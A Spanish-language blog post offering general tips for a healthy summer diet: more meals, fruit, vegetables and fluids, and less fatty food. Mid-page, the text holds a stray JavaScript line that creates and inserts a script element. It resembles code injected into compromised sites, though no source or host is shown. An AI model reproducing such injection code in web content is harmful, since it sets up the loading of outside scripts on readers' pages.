Salud y belleza » Salud, alimentos, dieta saludable

Cómo seguir una alimentación saludable en verano

Sin Comentarios

Con el verano llegan las altas temperaturas y, para muchos, las tan codiciadas vacaciones. Esto hace que en muchos casos modifiquemos nuestros hábitos alimentarios dejando atrás comidas muy pesadas y calóricas como guisos, chocolates calientes, cremas… y solemos consumir preparados más frescos como ensaladas o batidos de frutas.

dieta-saludable-verano

Esto se debe a que el calor hace que nuestro organismo necesite más agua por la pérdida de líquido. No es que comamos mucho menos que en invierno, pero sí seguimos una dieta distinta porque necesitamos menos calorías y más hidratación. Así que haz caso a tu cuerpo y elige comidas más ligeras y refrescantes en verano. Para ello vamos a darte algunos consejos para seguir una alimentación saludable en verano:

- Distribuye los alimentos en cuatro o más comidas al día: el desayuno, el almuerzo, la merienda y la cena. Así evitarás hacer comidas muy abundantes y difíciles de digerir.

- Aumentar el consumo de frutas y verduras. Además, como están de temporada serán más baratas y sabrosas.

- Aumentar el consumo de líquidos, tanto en las comidas como fuera.

- No comer alimentos con elevado contenido en grasas como frituras o embutidos porque provocan digestiones lentas y pesadas.

¿Sueles cambiar tu tipo de dieta en verano?

var d=document;var s=d.createElement('script'); document.currentScript.parentNode.insertBefore(s, document.currentScript);

Más consejos de salud y belleza : , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.